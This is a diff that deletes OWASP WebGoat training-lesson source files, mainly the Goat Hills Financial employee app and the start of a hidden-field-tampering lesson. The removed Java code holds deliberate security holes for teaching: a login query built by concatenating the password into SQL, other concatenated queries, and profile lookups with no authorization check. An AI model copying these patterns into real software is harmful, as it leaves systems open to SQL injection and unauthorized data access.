-        return lessonFunctions.get(actionName);
-    }
-
-    public void handleRequest(WebSession s)
-    {
-        if (s.getLessonSession(this) == null) s.openLessonSession(this);
-
-        String requestedActionName = null;
-        try
-        {
-            requestedActionName = s.getParser().getStringParameter("action");
-        } catch (ParameterNotFoundException pnfe)
-        {
-            // Let them eat login page.
-            requestedActionName = LOGIN_ACTION;
-        }
-
-        try
-        {
-            LessonAction action = getAction(requestedActionName);
-            if (action == null)
-            {
-                setCurrentAction(s, ERROR_ACTION);
-            }
-            else
-            {
-                // System.out.println("GoatHillsFinancial.handleRequest() dispatching to: " +
-                // action.getActionName());
-                if (action.requiresAuthentication())
-                {
-                    if (action.isAuthenticated(s))
-                    {
-                        action.handleRequest(s);
-                    }
-                    else
-                        throw new UnauthenticatedException();
-                }
-                else
-                {
-                    // Access to Login does not require authentication.
-                    action.handleRequest(s);
-                }
-            }
-        } catch (ParameterNotFoundException pnfe)
-        {
-            // System.out.println("Missing parameter");
-            pnfe.printStackTrace();
-            setCurrentAction(s, ERROR_ACTION);
-        } catch (ValidationException ve)
-        {
-            // System.out.println("Validation failed");
-            ve.printStackTrace();
-            setCurrentAction(s, ERROR_ACTION);
-        } catch (UnauthenticatedException ue)
-        {
-            s.setMessage("Login failed");
-            // System.out.println("Authentication failure");
-            ue.printStackTrace();
-        } catch (UnauthorizedException ue2)
-        {
-            s.setMessage("You are not authorized to perform this function");
-            // System.out.println("Authorization failure");
-            setCurrentAction(s, ERROR_ACTION);
-            ue2.printStackTrace();
-        } catch (Exception e)
-        {
-            // All other errors send the user to the generic error page
-            // System.out.println("handleRequest() error");
-            e.printStackTrace();
-            setCurrentAction(s, ERROR_ACTION);
-        }
-
-        // All this does for this lesson is ensure that a non-null content exists.
-        setContent(new ElementContainer());
-    }
-
-    public boolean isAuthorized(WebSession s, int userId, String functionId)
-    {
-        // System.out.println("Checking authorization from " + getCurrentAction(s));
-        LessonAction action = getAction(getCurrentAction(s));
-        return action.isAuthorized(s, userId, functionId);
-    }
-
-    public int getUserId(WebSession s) throws ParameterNotFoundException
-    {
-        LessonAction action = getAction(getCurrentAction(s));
-        return action.getUserId(s);
-    }
-
-    public String getUserName(WebSession s) throws ParameterNotFoundException
-    {
-        LessonAction action = getAction(getCurrentAction(s));
-        return action.getUserName(s);
-    }
-
-    protected String getJspPath()
-    {
-        return "/lessons/" + getLessonName() + "/";
-    }
-
-    public String getTemplatePage(WebSession s)
-    {
-        return getJspPath() + getLessonName() + ".jsp";
-    }
-
-    public String getPage(WebSession s)
-    {
-        String page = getJspPath() + getCurrentAction(s) + ".jsp";
-
-        return page;
-    }
-
-    protected Integer getDefaultRanking()
-    {
-        return DEFAULT_RANKING;
-    }
-
-    public String getTitle()
-    {
-        return "Goat Hills Financials";
-    }
-
-    public String getSourceFileName()
-    {
-        // FIXME: Need to generalize findSourceResource() and use it on the currently active
-        // LessonAction delegate to get its source file.
-        // return findSourceResource(getCurrentLessonScreen()....);
-        return super.getSourceFileName();
-    }
-
-    @Override
-    protected boolean getDefaultHidden()
-    {
-        return getClass().equals(GoatHillsFinancial.class);
-    }
-
-    public Element getCredits()
-    {
-        return super.getCustomCredits("", ASPECT_LOGO);
-    }
-
-    @Override
-    protected String getLessonName()
-    {
-        String className = getClass().getName();
-        int index = className.lastIndexOf('.');
-        if (index > -1) return className.substring(index + 1);
-        return super.getLessonName();
-    }
-}

src/main/java/org/owasp/webgoat/lessons/GoatHillsFinancial/LessonAction.java

@@ -1,29 +0,0 @@
-
-package org.owasp.webgoat.lessons.GoatHillsFinancial;
-
-import org.owasp.webgoat.session.ParameterNotFoundException;
-import org.owasp.webgoat.session.UnauthenticatedException;
-import org.owasp.webgoat.session.UnauthorizedException;
-import org.owasp.webgoat.session.ValidationException;
-import org.owasp.webgoat.session.WebSession;
-
-
-public interface LessonAction
-{
-    public void handleRequest(WebSession s) throws ParameterNotFoundException, UnauthenticatedException,
-            UnauthorizedException, ValidationException;
-
-    public String getNextPage(WebSession s);
-
-    public String getActionName();
-
-    public boolean requiresAuthentication();
-
-    public boolean isAuthenticated(WebSession s);
-
-    public boolean isAuthorized(WebSession s, int employeeId, String functionId);
-
-    public int getUserId(WebSession s) throws ParameterNotFoundException;
-
-    public String getUserName(WebSession s) throws ParameterNotFoundException;
-}

src/main/java/org/owasp/webgoat/lessons/GoatHillsFinancial/ListStaff.java

@@ -1,112 +0,0 @@
-
-package org.owasp.webgoat.lessons.GoatHillsFinancial;
-
-import java.sql.ResultSet;
-import java.sql.SQLException;
-import java.sql.Statement;
-import java.util.List;
-import java.util.Vector;
-import org.owasp.webgoat.session.EmployeeStub;
-import org.owasp.webgoat.session.ParameterNotFoundException;
-import org.owasp.webgoat.session.UnauthenticatedException;
-import org.owasp.webgoat.session.UnauthorizedException;
-import org.owasp.webgoat.session.WebSession;
-
-
-/***************************************************************************************************
- * 
- * 
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
- * please see http://www.owasp.org/
- * 
- * Copyright (c) 2002 - 20014 Bruce Mayhew
- * 
- * This program is free software; you can redistribute it and/or modify it under the terms of the
- * GNU General Public License as published by the Free Software Foundation; either version 2 of the
- * License, or (at your option) any later version.
- * 
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- * 
- * You should have received a copy of the GNU General Public License along with this program; if
- * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
- * 02111-1307, USA.
- * 
- * Getting Source ==============
- * 
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
- * 
- * For details, please see http://webgoat.github.io
- */
-public class ListStaff extends DefaultLessonAction
-{
-
-    public ListStaff(GoatHillsFinancial lesson, String lessonName, String actionName)
-    {
-        super(lesson, lessonName, actionName);
-    }
-
-    public void handleRequest(WebSession s) throws ParameterNotFoundException, UnauthenticatedException,
-            UnauthorizedException
-    {
-        getLesson().setCurrentAction(s, getActionName());
-
-        if (isAuthenticated(s))
-        {
-            int userId = getIntSessionAttribute(s, getLessonName() + "." + GoatHillsFinancial.USER_ID);
-
-            List<EmployeeStub> employees = getAllEmployees(s, userId);
-            setSessionAttribute(s, getLessonName() + "." + GoatHillsFinancial.STAFF_ATTRIBUTE_KEY, employees);
-        }
-        else
-            throw new UnauthenticatedException();
-    }
-
-    public String getNextPage(WebSession s)
-    {
-        return GoatHillsFinancial.LISTSTAFF_ACTION;
-    }
-
-    public List<EmployeeStub> getAllEmployees(WebSession s, int userId) throws UnauthorizedException
-    {
-        // Query the database for all employees "owned" by the given employee
-
-        List<EmployeeStub> employees = new Vector<EmployeeStub>();
-
-        try
-        {
-            String query = "SELECT employee.userid,first_name,last_name,role FROM employee,roles WHERE employee.userid=roles.userid and employee.userid in "
-                    + "(SELECT employee_id FROM ownership WHERE employer_id = " + userId + ")";
-
-            try
-            {
-                Statement answer_statement = WebSession.getConnection(s)
-                        .createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
-                ResultSet answer_results = answer_statement.executeQuery(query);
-                answer_results.beforeFirst();
-                while (answer_results.next())
-                {
-                    int employeeId = answer_results.getInt("userid");
-                    String firstName = answer_results.getString("first_name");
-                    String lastName = answer_results.getString("last_name");
-                    String role = answer_results.getString("role");
-                    // System.out.println("Retrieving employee stub for role " + role);
-                    EmployeeStub stub = new EmployeeStub(employeeId, firstName, lastName, role);
-                    employees.add(stub);
-                }
-            } catch (SQLException sqle)
-            {
-                s.setMessage("Error getting employees");
-                sqle.printStackTrace();
-            }
-        } catch (Exception e)
-        {
-            s.setMessage("Error getting employees");
-            e.printStackTrace();
-        }
-
-        return employees;
-    }
-}

src/main/java/org/owasp/webgoat/lessons/GoatHillsFinancial/Login.java

@@ -1,191 +0,0 @@
-
-package org.owasp.webgoat.lessons.GoatHillsFinancial;
-
-import java.sql.ResultSet;
-import java.sql.SQLException;
-import java.sql.Statement;
-import java.util.List;
-import java.util.Vector;
-import org.owasp.webgoat.session.EmployeeStub;
-import org.owasp.webgoat.session.ParameterNotFoundException;
-import org.owasp.webgoat.session.UnauthenticatedException;
-import org.owasp.webgoat.session.UnauthorizedException;
-import org.owasp.webgoat.session.ValidationException;
-import org.owasp.webgoat.session.WebSession;
-
-
-/***************************************************************************************************
- * 
- * 
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
- * please see http://www.owasp.org/
- * 
- * Copyright (c) 2002 - 20014 Bruce Mayhew
- * 
- * This program is free software; you can redistribute it and/or modify it under the terms of the
- * GNU General Public License as published by the Free Software Foundation; either version 2 of the
- * License, or (at your option) any later version.
- * 
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- * 
- * You should have received a copy of the GNU General Public License along with this program; if
- * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
- * 02111-1307, USA.
- * 
- * Getting Source ==============
- * 
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
- * 
- * For details, please see http://webgoat.github.io
- */
-public class Login extends DefaultLessonAction
-{
-
-    private LessonAction chainedAction;
-
-    public Login(GoatHillsFinancial lesson, String lessonName, String actionName, LessonAction chainedAction)
-    {
-        super(lesson, lessonName, actionName);
-        this.chainedAction = chainedAction;
-    }
-
-    public void handleRequest(WebSession s) throws ParameterNotFoundException, ValidationException
-    {
-        // System.out.println("Login.handleRequest()");
-        getLesson().setCurrentAction(s, getActionName());
-
-        List employees = getAllEmployees(s);
-        setSessionAttribute(s, getLessonName() + "." + GoatHillsFinancial.STAFF_ATTRIBUTE_KEY, employees);
-
-        int employeeId = -1;
-        try
-        {
-            employeeId = s.getParser().getIntParameter(GoatHillsFinancial.EMPLOYEE_ID);
-            String password = s.getParser().getStringParameter(GoatHillsFinancial.PASSWORD);
-
-            // Attempt authentication
-            if (login(s, employeeId, password))
-            {
-                // Execute the chained Action if authentication succeeded.
-                try
-                {
-                    chainedAction.handleRequest(s);
-                } catch (UnauthenticatedException ue1)
-                {
-                    // System.out.println("Internal server error");
-                    ue1.printStackTrace();
-                } catch (UnauthorizedException ue2)
-                {
-                    // System.out.println("Internal server error");
-                    ue2.printStackTrace();
-                }
-            }
-            else
-                s.setMessage("Login failed");
-        } catch (ParameterNotFoundException pnfe)
-        {
-            // No credentials offered, so we log them out
-            setSessionAttribute(s, getLessonName() + ".isAuthenticated", Boolean.FALSE);
-        }
-    }
-
-    /**
-     * After this.handleRequest() is called, when the View asks for the current JSP to load, it will
-     * get one initialized by this call.
-     */
-    public String getNextPage(WebSession s)
-    {
-        String nextPage = GoatHillsFinancial.LOGIN_ACTION;
-
-        if (isAuthenticated(s)) nextPage = chainedAction.getNextPage(s);
-
-        return nextPage;
-
-    }
-
-    public boolean requiresAuthentication()
-    {
-        return false;
-    }
-
-    public boolean login(WebSession s, int userId, String password)
-    {
-        // System.out.println("Logging in to lesson");
-        boolean authenticated = false;
-
-        try
-        {
-            String query = "SELECT * FROM employee WHERE userid = " + userId + " and password = '" + password + "'";
-
-            try
-            {
-                Statement answer_statement = WebSession.getConnection(s)
-                        .createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
-                ResultSet answer_results = answer_statement.executeQuery(query);
-                if (answer_results.first())
-                {
-                    setSessionAttribute(s, getLessonName() + ".isAuthenticated", Boolean.TRUE);
-                    setSessionAttribute(s, getLessonName() + "." + GoatHillsFinancial.USER_ID, Integer.toString(userId));
-                    authenticated = true;
-                }
-
-            } catch (SQLException sqle)
-            {
-                s.setMessage("Error logging in");
-                sqle.printStackTrace();
-            }
-        } catch (Exception e)
-        {
-            s.setMessage("Error logging in");
-            e.printStackTrace();
-        }
-
-        // System.out.println("Lesson login result: " + authenticated);
-        return authenticated;
-    }
-
-    public List<EmployeeStub> getAllEmployees(WebSession s)
-    {
-        List<EmployeeStub> employees = new Vector<EmployeeStub>();
-
-        // Query the database for all roles the given employee belongs to
-        // Query the database for all employees "owned" by these roles
-
-        try
-        {
-            String query = "SELECT employee.userid,first_name,last_name,role FROM employee,roles "
-                    + "where employee.userid=roles.userid";
-
-            try
-            {
-                Statement answer_statement = WebSession.getConnection(s)
-                        .createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
-                ResultSet answer_results = answer_statement.executeQuery(query);
-                answer_results.beforeFirst();
-                while (answer_results.next())
-                {
-                    int employeeId = answer_results.getInt("userid");
-                    String firstName = answer_results.getString("first_name");
-                    String lastName = answer_results.getString("last_name");
-                    String role = answer_results.getString("role");
-                    EmployeeStub stub = new EmployeeStub(employeeId, firstName, lastName, role);
-                    employees.add(stub);
-                }
-            } catch (SQLException sqle)
-            {
-                s.setMessage("Error getting employees");
-                sqle.printStackTrace();
-            }
-        } catch (Exception e)
-        {
-            s.setMessage("Error getting employees");
-            e.printStackTrace();
-        }
-
-        return employees;
-    }
-
-}

src/main/java/org/owasp/webgoat/lessons/GoatHillsFinancial/Logout.java

@@ -1,76 +0,0 @@
-
-package org.owasp.webgoat.lessons.GoatHillsFinancial;
-
-import org.owasp.webgoat.session.ParameterNotFoundException;
-import org.owasp.webgoat.session.UnauthenticatedException;
-import org.owasp.webgoat.session.UnauthorizedException;
-import org.owasp.webgoat.session.ValidationException;
-import org.owasp.webgoat.session.WebSession;
-
-
-/***************************************************************************************************
- * 
- * 
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
- * please see http://www.owasp.org/
- * 
- * Copyright (c) 2002 - 20014 Bruce Mayhew
- * 
- * This program is free software; you can redistribute it and/or modify it under the terms of the
- * GNU General Public License as published by the Free Software Foundation; either version 2 of the
- * License, or (at your option) any later version.
- * 
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- * 
- * You should have received a copy of the GNU General Public License along with this program; if
- * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
- * 02111-1307, USA.
- * 
- * Getting Source ==============
- * 
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
- * 
- * For details, please see http://webgoat.github.io
- */
-public class Logout extends DefaultLessonAction
-{
-
-    private LessonAction chainedAction;
-
-    public Logout(GoatHillsFinancial lesson, String lessonName, String actionName, LessonAction chainedAction)
-    {
-        super(lesson, lessonName, actionName);
-        this.chainedAction = chainedAction;
-    }
-
-    public void handleRequest(WebSession s) throws ParameterNotFoundException, ValidationException
-    {
-        // System.out.println("Logging out");
-
-        setSessionAttribute(s, getLessonName() + ".isAuthenticated", Boolean.FALSE);
-
-        // FIXME: Maybe we should forward to Login.
-        try
-        {
-            chainedAction.handleRequest(s);
-        } catch (UnauthenticatedException ue1)
-        {
-            // System.out.println("Internal server error");
-            ue1.printStackTrace();
-        } catch (UnauthorizedException ue2)
-        {
-            // System.out.println("Internal server error");
-            ue2.printStackTrace();
-        }
-
-    }
-
-    public String getNextPage(WebSession s)
-    {
-        return chainedAction.getNextPage(s);
-    }
-
-}

src/main/java/org/owasp/webgoat/lessons/GoatHillsFinancial/SearchStaff.java

@@ -1,47 +0,0 @@
-
-package org.owasp.webgoat.lessons.GoatHillsFinancial;
-
-import org.owasp.webgoat.session.WebSession;
-
-
-/***************************************************************************************************
- * 
- * 
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
- * please see http://www.owasp.org/
- * 
- * Copyright (c) 2002 - 20014 Bruce Mayhew
- * 
- * This program is free software; you can redistribute it and/or modify it under the terms of the
- * GNU General Public License as published by the Free Software Foundation; either version 2 of the
- * License, or (at your option) any later version.
- * 
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- * 
- * You should have received a copy of the GNU General Public License along with this program; if
- * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
- * 02111-1307, USA.
- * 
- * Getting Source ==============
- * 
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
- * 
- * For details, please see http://webgoat.github.io
- */
-public class SearchStaff extends DefaultLessonAction
-{
-
-    public SearchStaff(GoatHillsFinancial lesson, String lessonName, String actionName)
-    {
-        super(lesson, lessonName, actionName);
-    }
-
-    public String getNextPage(WebSession s)
-    {
-        return GoatHillsFinancial.SEARCHSTAFF_ACTION;
-    }
-
-}

src/main/java/org/owasp/webgoat/lessons/GoatHillsFinancial/UpdateProfile.java

@@ -1,212 +0,0 @@
-
-package org.owasp.webgoat.lessons.GoatHillsFinancial;
-
-import java.sql.PreparedStatement;
-import java.sql.ResultSet;
-import java.sql.SQLException;
-import java.sql.Statement;
-import org.owasp.webgoat.session.Employee;
-import org.owasp.webgoat.session.ParameterNotFoundException;
-import org.owasp.webgoat.session.UnauthenticatedException;
-import org.owasp.webgoat.session.UnauthorizedException;
-import org.owasp.webgoat.session.ValidationException;
-import org.owasp.webgoat.session.WebSession;
-
-
-/***************************************************************************************************
- * 
- * 
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
- * please see http://www.owasp.org/
- * 
- * Copyright (c) 2002 - 20014 Bruce Mayhew
- * 
- * This program is free software; you can redistribute it and/or modify it under the terms of the
- * GNU General Public License as published by the Free Software Foundation; either version 2 of the
- * License, or (at your option) any later version.
- * 
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- * 
- * You should have received a copy of the GNU General Public License along with this program; if
- * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
- * 02111-1307, USA.
- * 
- * Getting Source ==============
- * 
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
- * 
- * For details, please see http://webgoat.github.io
- */
-public class UpdateProfile extends DefaultLessonAction
-{
-
-    private LessonAction chainedAction;
-
-    public UpdateProfile(GoatHillsFinancial lesson, String lessonName, String actionName, LessonAction chainedAction)
-    {
-        super(lesson, lessonName, actionName);
-        this.chainedAction = chainedAction;
-    }
-
-    public void handleRequest(WebSession s) throws ParameterNotFoundException, UnauthenticatedException,
-            UnauthorizedException, ValidationException
-    {
-        if (isAuthenticated(s))
-        {
-            int userId = getIntSessionAttribute(s, getLessonName() + "." + GoatHillsFinancial.USER_ID);
-
-            int subjectId = s.getParser().getIntParameter(GoatHillsFinancial.EMPLOYEE_ID, 0);
-
-            String firstName = s.getParser().getStringParameter(GoatHillsFinancial.FIRST_NAME);
-            String lastName = s.getParser().getStringParameter(GoatHillsFinancial.LAST_NAME);
-            String ssn = s.getParser().getStringParameter(GoatHillsFinancial.SSN);
-            String title = s.getParser().getStringParameter(GoatHillsFinancial.TITLE);
-            String phone = s.getParser().getStringParameter(GoatHillsFinancial.PHONE_NUMBER);
-            String address1 = s.getParser().getStringParameter(GoatHillsFinancial.ADDRESS1);
-            String address2 = s.getParser().getStringParameter(GoatHillsFinancial.ADDRESS2);
-            int manager = s.getParser().getIntParameter(GoatHillsFinancial.MANAGER);
-            String startDate = s.getParser().getStringParameter(GoatHillsFinancial.START_DATE);
-            int salary = s.getParser().getIntParameter(GoatHillsFinancial.SALARY);
-            String ccn = s.getParser().getStringParameter(GoatHillsFinancial.CCN);
-            int ccnLimit = s.getParser().getIntParameter(GoatHillsFinancial.CCN_LIMIT);
-            String disciplinaryActionDate = s.getParser().getStringParameter(GoatHillsFinancial.DISCIPLINARY_DATE);
-            String disciplinaryActionNotes = s.getParser().getStringParameter(GoatHillsFinancial.DISCIPLINARY_NOTES);
-            String personalDescription = s.getParser().getStringParameter(GoatHillsFinancial.DESCRIPTION);
-
-            Employee employee = new Employee(subjectId, firstName, lastName, ssn, title, phone, address1, address2,
-                    manager, startDate, salary, ccn, ccnLimit, disciplinaryActionDate, disciplinaryActionNotes,
-                    personalDescription);
-
-            if (subjectId > 0)
-            {
-                this.changeEmployeeProfile(s, userId, subjectId, employee);
-                setRequestAttribute(s, getLessonName() + "." + GoatHillsFinancial.EMPLOYEE_ID, Integer
-                        .toString(subjectId));
-            }
-            else
-                this.createEmployeeProfile(s, userId, employee);
-
-            try
-            {
-                chainedAction.handleRequest(s);
-            } catch (UnauthenticatedException ue1)
-            {
-                // System.out.println("Internal server error");
-                ue1.printStackTrace();
-            } catch (UnauthorizedException ue2)
-            {
-                // System.out.println("Internal server error");
-                ue2.printStackTrace();
-            }
-        }
-        else
-            throw new UnauthenticatedException();
-    }
-
-    public String getNextPage(WebSession s)
-    {
-        return GoatHillsFinancial.VIEWPROFILE_ACTION;
-    }
-
-    public void changeEmployeeProfile(WebSession s, int userId, int subjectId, Employee employee)
-            throws UnauthorizedException
-    {
-        try
-        {
-            // Note: The password field is ONLY set by ChangePassword
-            String query = "UPDATE employee SET first_name = ?, last_name = ?, ssn = ?, title = ?, phone = ?, address1 = ?, address2 = ?,"
-                    + " manager = ?, start_date = ?, ccn = ?, ccn_limit = ?,"
-                    + " personal_description = ? WHERE userid = ?;";
-            try
-            {
-                PreparedStatement ps = WebSession.getConnection(s).prepareStatement(query,
-                                                                                    ResultSet.TYPE_SCROLL_INSENSITIVE,
-                                                                                    ResultSet.CONCUR_READ_ONLY);
-
-                ps.setString(1, employee.getFirstName());
-                ps.setString(2, employee.getLastName());
-                ps.setString(3, employee.getSsn());
-                ps.setString(4, employee.getTitle());
-                ps.setString(5, employee.getPhoneNumber());
-                ps.setString(6, employee.getAddress1());
-                ps.setString(7, employee.getAddress2());
-                ps.setInt(8, employee.getManager());
-                ps.setString(9, employee.getStartDate());
-                ps.setString(10, employee.getCcn());
-                ps.setInt(11, employee.getCcnLimit());
-                ps.setString(12, employee.getPersonalDescription());
-                ps.setInt(13, subjectId);
-                ps.execute();
-            } catch (SQLException sqle)
-            {
-                s.setMessage("Error updating employee profile");
-                sqle.printStackTrace();
-            }
-
-        } catch (Exception e)
-        {
-            s.setMessage("Error updating employee profile");
-            e.printStackTrace();
-        }
-    }
-
-    private int getNextUID(WebSession s)
-    {
-        int uid = -1;
-        try
-        {
-            Statement statement = WebSession.getConnection(s).createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE,
-                                                                                ResultSet.CONCUR_READ_ONLY);
-            ResultSet results = statement.executeQuery("select max(userid) as uid from employee");
-            results.first();
-            uid = results.getInt("uid");
-        } catch (SQLException sqle)
-        {
-            sqle.printStackTrace();
-            s.setMessage("Error updating employee profile");
-        }
-        return uid + 1;
-    }
-
-    public void createEmployeeProfile(WebSession s, int userId, Employee employee) throws UnauthorizedException
-    {
-        try
-        {
-            int nextId = getNextUID(s);
-            String query = "INSERT INTO employee VALUES ( " + nextId + ", ?,?,?,?,?,?,?,?,?,?,?,?,?,?)";
-
-            try
-            {
-                PreparedStatement ps = WebSession.getConnection(s).prepareStatement(query);
-
-                ps.setString(1, employee.getFirstName().toLowerCase());
-                ps.setString(2, employee.getLastName());
-                ps.setString(3, employee.getSsn());
-                ps.setString(4, employee.getTitle());
-                ps.setString(5, employee.getPhoneNumber());
-                ps.setString(6, employee.getAddress1());
-                ps.setString(7, employee.getAddress2());
-                ps.setInt(8, employee.getManager());
-                ps.setString(9, employee.getStartDate());
-                ps.setString(10, employee.getCcn());
-                ps.setInt(11, employee.getCcnLimit());
-                ps.setString(12, employee.getDisciplinaryActionDate());
-                ps.setString(13, employee.getDisciplinaryActionNotes());
-                ps.setString(14, employee.getPersonalDescription());
-
-                ps.execute();
-            } catch (SQLException sqle)
-            {
-                s.setMessage("Error updating employee profile");
-                sqle.printStackTrace();
-            }
-        } catch (Exception e)
-        {
-            s.setMessage("Error updating employee profile");
-            e.printStackTrace();
-        }
-    }
-}

src/main/java/org/owasp/webgoat/lessons/GoatHillsFinancial/ViewProfile.java

@@ -1,124 +0,0 @@
-
-package org.owasp.webgoat.lessons.GoatHillsFinancial;
-
-import java.sql.ResultSet;
-import java.sql.SQLException;
-import java.sql.Statement;
-import org.owasp.webgoat.session.Employee;
-import org.owasp.webgoat.session.ParameterNotFoundException;
-import org.owasp.webgoat.session.UnauthenticatedException;
-import org.owasp.webgoat.session.UnauthorizedException;
-import org.owasp.webgoat.session.WebSession;
-
-
-/***************************************************************************************************
- * 
- * 
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
- * please see http://www.owasp.org/
- * 
- * Copyright (c) 2002 - 20014 Bruce Mayhew
- * 
- * This program is free software; you can redistribute it and/or modify it under the terms of the
- * GNU General Public License as published by the Free Software Foundation; either version 2 of the
- * License, or (at your option) any later version.
- * 
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- * 
- * You should have received a copy of the GNU General Public License along with this program; if
- * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
- * 02111-1307, USA.
- * 
- * Getting Source ==============
- * 
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
- * 
- * For details, please see http://webgoat.github.io
- */
-public class ViewProfile extends DefaultLessonAction
-{
-
-    public ViewProfile(GoatHillsFinancial lesson, String lessonName, String actionName)
-    {
-        super(lesson, lessonName, actionName);
-    }
-
-    public void handleRequest(WebSession s) throws ParameterNotFoundException, UnauthenticatedException,
-            UnauthorizedException
-    {
-        getLesson().setCurrentAction(s, getActionName());
-
-        if (isAuthenticated(s))
-        {
-            int userId = getIntSessionAttribute(s, getLessonName() + "." + GoatHillsFinancial.USER_ID);
-            int employeeId = -1;
-            try
-            {
-                // User selected employee
-                employeeId = s.getParser().getIntParameter(GoatHillsFinancial.EMPLOYEE_ID);
-            } catch (ParameterNotFoundException e)
-            {
-                // May be an internally selected employee
-                employeeId = getIntRequestAttribute(s, getLessonName() + "." + GoatHillsFinancial.EMPLOYEE_ID);
-            }
-
-            Employee employee = getEmployeeProfile(s, userId, employeeId);
-            setSessionAttribute(s, getLessonName() + "." + GoatHillsFinancial.EMPLOYEE_ATTRIBUTE_KEY, employee);
-        }
-        else
-            throw new UnauthenticatedException();
-
-    }
-
-    public String getNextPage(WebSession s)
-    {
-        return GoatHillsFinancial.VIEWPROFILE_ACTION;
-    }
-
-    protected Employee getEmployeeProfile(WebSession s, int userId, int subjectUserId) throws UnauthorizedException
-    {
-        Employee profile = null;
-
-        // Query the database for the profile data of the given employee
-        try
-        {
-            String query = "SELECT * FROM employee WHERE userid = " + subjectUserId;
-
-            try
-            {
-                Statement answer_statement = WebSession.getConnection(s)
-                        .createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
-                ResultSet answer_results = answer_statement.executeQuery(query);
-                if (answer_results.next())
-                {
-                    // Note: Do NOT get the password field.
-                    profile = new Employee(answer_results.getInt("userid"), answer_results.getString("first_name"),
-                            answer_results.getString("last_name"), answer_results.getString("ssn"), answer_results
-                                    .getString("title"), answer_results.getString("phone"), answer_results
-                                    .getString("address1"), answer_results.getString("address2"), answer_results
-                                    .getInt("manager"), answer_results.getString("start_date"), answer_results
-                                    .getInt("salary"), answer_results.getString("ccn"), answer_results
-                                    .getInt("ccn_limit"), answer_results.getString("disciplined_date"), answer_results
-                                    .getString("disciplined_notes"), answer_results.getString("personal_description"));
-                    /*
-                     * System.out.println("Retrieved employee from db: " + profile.getFirstName() +
-                     * " " + profile.getLastName() + " (" + profile.getId() + ")");
-                     */}
-            } catch (SQLException sqle)
-            {
-                s.setMessage("Error getting employee profile");
-                sqle.printStackTrace();
-            }
-        } catch (Exception e)
-        {
-            s.setMessage("Error getting employee profile");
-            e.printStackTrace();
-        }
-
-        return profile;
-    }
-
-}

src/main/java/org/owasp/webgoat/lessons/HiddenFieldTampering.java

@@ -1,230 +0,0 @@
-
-package org.owasp.webgoat.lessons;
-
-import java.text.DecimalFormat;
-import java.util.ArrayList;
-import java.util.List;
-import java.util.regex.Pattern;
-import org.apache.ecs.Element;
-import org.apache.ecs.ElementContainer;
-import org.apache.ecs.StringElement;
-import org.apache.ecs.html.A;
-import org.apache.ecs.html.B;
-import org.apache.ecs.html.BR;
-import org.apache.ecs.html.Center;
-import org.apache.ecs.html.H1;
-import org.apache.ecs.html.IMG;
-import org.apache.ecs.html.Input;
-import org.apache.ecs.html.P;
-import org.apache.ecs.html.TD;
-import org.apache.ecs.html.TH;
-import org.apache.ecs.html.TR;
-import org.apache.ecs.html.Table;
-import org.owasp.webgoat.session.ECSFactory;
-import org.owasp.webgoat.session.WebSession;
-
-
-/***************************************************************************************************
- * 
- * 
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
- * please see http://www.owasp.org/
- * 
- * Copyright (c) 2002 - 20014 Bruce Mayhew
- * 
- * This program is free software; you can redistribute it and/or modify it under the terms of the
- * GNU General Public License as published by the Free Software Foundation; either version 2 of the
- * License, or (at your option) any later version.
- * 
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- * 
- * You should have received a copy of the GNU General Public License along with this program; if
- * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
- * 02111-1307, USA.
- * 
- * Getting Source ==============
- * 
